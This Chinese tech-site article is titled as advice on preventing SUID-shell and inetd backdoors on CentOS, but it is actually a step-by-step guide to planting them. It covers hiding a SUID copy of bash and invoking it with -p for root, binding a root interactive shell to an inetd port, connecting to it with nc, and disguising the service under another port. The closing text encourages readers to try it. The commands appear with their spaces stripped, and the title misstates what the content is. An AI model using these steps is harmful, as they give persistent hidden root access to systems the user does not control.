溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何防止CentOS被suid shell與inetd后門利用

發(fā)布時間:2021-09-24 14:22:24 來源:億速云 閱讀:146 作者:iii 欄目:系統(tǒng)運維

本篇內(nèi)容主要講解“如何防止CentOS被suid shell與inetd后門利用”,感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷,實用性強。下面就讓小編來帶大家學習“如何防止CentOS被suid shell與inetd后門利用”吧!

你現(xiàn)在已經(jīng)是root用戶,想留一個后門。

如何防止CentOS被suid shell與inetd后門利用

系統(tǒng)環(huán)境:

dawg:~#uname-a

Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux

1.SUIDshell

首先,先切換成為root用戶,并執(zhí)行以下的命令:

dawg:~#cp/bin/bash/.wootdawg:~#chmod4755/.wootdawg:~#ls-al/.woot-rwsr-xr-x1rootroot690668Jul2417:14/.woot

當然,你也可以起其他更具備隱藏性的名字,我想猥瑣并機智的你,肯定能想出很多好的名字的。文件前面的那一點也不是必要的,只是為了隱藏文件(在文件名的最前面加上“.”,就可以在任意文件目錄下進行隱藏).

現(xiàn)在,做為一個普通用戶,我們來啟用這個后門:

fw@dawg:~$iduid=1000(fw)gid=1000(fw)groups=1000(fw)fw@dawg:~$/.woot.woot-2.05b$iduid=1000(fw)gid=1000(fw)groups=1000(fw).woot-2.05b$

為什么不行呢?

因為bash3針對suid有一些護衛(wèi)的措施.但這也不是不可破的:

.woot-2.05b$/.woot-p

.woot-2.05b#id

uid=1000(fw)gid=1000(fw)euid=0(root)groups=1000(fw)

使用-p參數(shù)來獲取一個rootshell.這個euid的意思是effectiveuserid(關于這些ID的知識,可以戳這里)

這里要特別注意的是,作為一個普通用戶執(zhí)行這個SUIDshell時,一定要使用全路徑。

小知識:

如何查找那些具有SUID的文件:

dawg:~#find/-perm+4000-ls

這時就會返回具有SUID位的文件啦。

2.遠程后門:利用/etc/inetd.conf

我們使用vi來修改/etc/inetd.conf文件

原文件:

#chargendgramudpwaitrootinternal

#discardstreamtcpnowaitrootinternal

#discarddgramudpwaitrootinternal

#daytimestreamtcpnowaitrootinternal

修改為:

#discardstreamtcpnowaitrootinternal

#discarddgramudpwaitrootinternal

daytimestreamtcpnowaitroot/bin/bashbash-i

開啟inetd:

dawg:~#inetd

如果要強制重啟inetd:

dawg:~#ps-ef|grepinetdroot36210Jul22?00:00:00/usr/sbin/inetdroot1376913643017:51pts/100:00:00grepinetddawg:~#kill-HUP362

現(xiàn)在我們就可以用nc來爆菊了:

C:tools192.168.1.77:inversehostlookupfailed:h_errno11004:NO_DATA

(UNKNOWN)[192.168.1.77]13(daytime)open

bash:nojobcontrolinthisshell

bash-2.05b#bash-2.05b#

bash-2.05b#iduid=0(root)

gid=0(root)groups=0(root)bash-2.05b#uname-a

Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux

小貼士:

我們可以修改/etc/services文件,加入以下的東西:

woot6666/tcp#evilbackdoorservice

然后修改/etc/inetd.conf:

wootstreamtcpnowaitroot/bin/bashbash-i

我們可以修改成一些常見的端口,以實現(xiàn)隱藏。

到此,相信大家對“如何防止CentOS被suid shell與inetd后門利用”有了更深的了解,不妨來實際操作一番吧!這里是億速云網(wǎng)站,更多相關內(nèi)容可以進入相關頻道進行查詢,關注我們,繼續(xù)學習!

向AI問一下細節(jié)

免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權內(nèi)容。

AI